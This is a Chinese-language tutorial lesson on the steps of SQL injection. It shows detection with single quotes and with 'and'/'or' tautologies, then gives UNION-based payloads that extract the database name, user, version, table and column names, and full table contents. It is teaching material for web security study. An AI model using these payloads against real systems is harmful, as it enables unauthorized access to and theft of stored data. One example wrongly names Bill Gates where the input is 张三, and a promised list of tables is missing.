上节了解了 SQL 注入的原理，但是我们进行 SQL 注入的时候肯定不是输入查询语句就能得到数据这么简单。

注入步骤

SQL 注入流程如下：

1. 判断是否存在注入
2. 存在注入后获取数据

1. 判断是否存在注入

通过输入特殊的数据触发异常可以用来判断是否存在 SQL 注入,如果下述三种情况同时存在，说明存在字符型注入

为什么返回异常就表示可能存在注入，因为如果返回了异常就表示后端执行了我们输入的 SQL 语句，没有返回异常则可能是后端将我们输入的做了字符串处理，哪怕输入 SQL 语句也看做是字符串，不会当作代码执行，这样我们就没办法进行注入。

①. 单引号法

输入: 张三'，存在 SQL 注入的代码会执行如下:
SELECT score FROM Info WHERE name='张三''
可以看到相对正常语法最后多了一个引号，执行会报错，如果返回了这个报错，说明可能存在注入。

②. 逻辑联结词 and

利用逻辑语句：条件1 and 条件2，当两个条件同时满足时，SQL 语句才会正确执行，只要有一个条件为假，其结果也为假，语句则不会执行。

(1). 输入：张三' and '1'='1，执行:
SELECT score FROM Info WHERE name='张三' and '1'='1'
'1'='1' 是一个永真条件，所以这条语句应该可以正常返回 Bill Gates 的数据

(2). 输入：张三' and '1'='2，执行：
SELECT score FROM Info WHERE name='张三' and '1'='2'
'1'='2' 是个假条件，所以这条语句应该不能返回数据

③. 逻辑联结词 or

利用逻辑语句: 条件1 or 条件2，其中一个条件为真时，语句便会执行

输入: 李四' or '1'='1，执行：
SELECT score FROM Info WHERE name='李四' or '1'='1'
1=1 为真，所以不管前面的 username 等于什么，这条语句都会执行，并且返回 score 列的所有数据，相当于SELECT score FROM Info

2. 获取数据

执行上面的操作后如果存在注入，就可以在注入点进行注入，获取数据

(1). 获取当前数据库名和数据库用户名
输入：张三' union select database(), user() #

(2). 获取当前的数据库版本和操作系统
输入：张三' union select version(), @@version_compile_os #

(3). 获取数据表名
输入：张三' union select table_name,table_schema from information_schema.tables where table_schema=[数据库名]

(4). 获取表中的列名
输入：张三' union select 1,group_concat(column_name) from information_schema.columns where table_name=[表名]

(5). 获取数据
输入：张三' union select * from users #

(6). 获取字段数
输入：张三' order by 5，改变 order by 后面的数字通过是否报错可以知道这张表有几列即几个字段，数字大于已有字段数时会报错

注意说明：

1. 查到的MySQL的版本⼩于4.0时，是不⽀持union select联合查询的。

2. 当MySQL版本⼤于5.0时，有个默认数据库information_schema，这个数据库包含了一些表和视图，提供了访问数据库元数据的方式。

3. 元数据是关于数据的数据，如数据库名或表名，列的数据类型，或访问权限等。有些时候用于表述该信息的其他术语包括“数据词典”和“系统目录”。

一些重要的数据字典表的说明：

上一节：一步一步学习Web安全 2.1 之 SQL 注入原理
下一节：一步一步学习 Web 安全 2.3 之 SQL 注入 dvwa 简单实践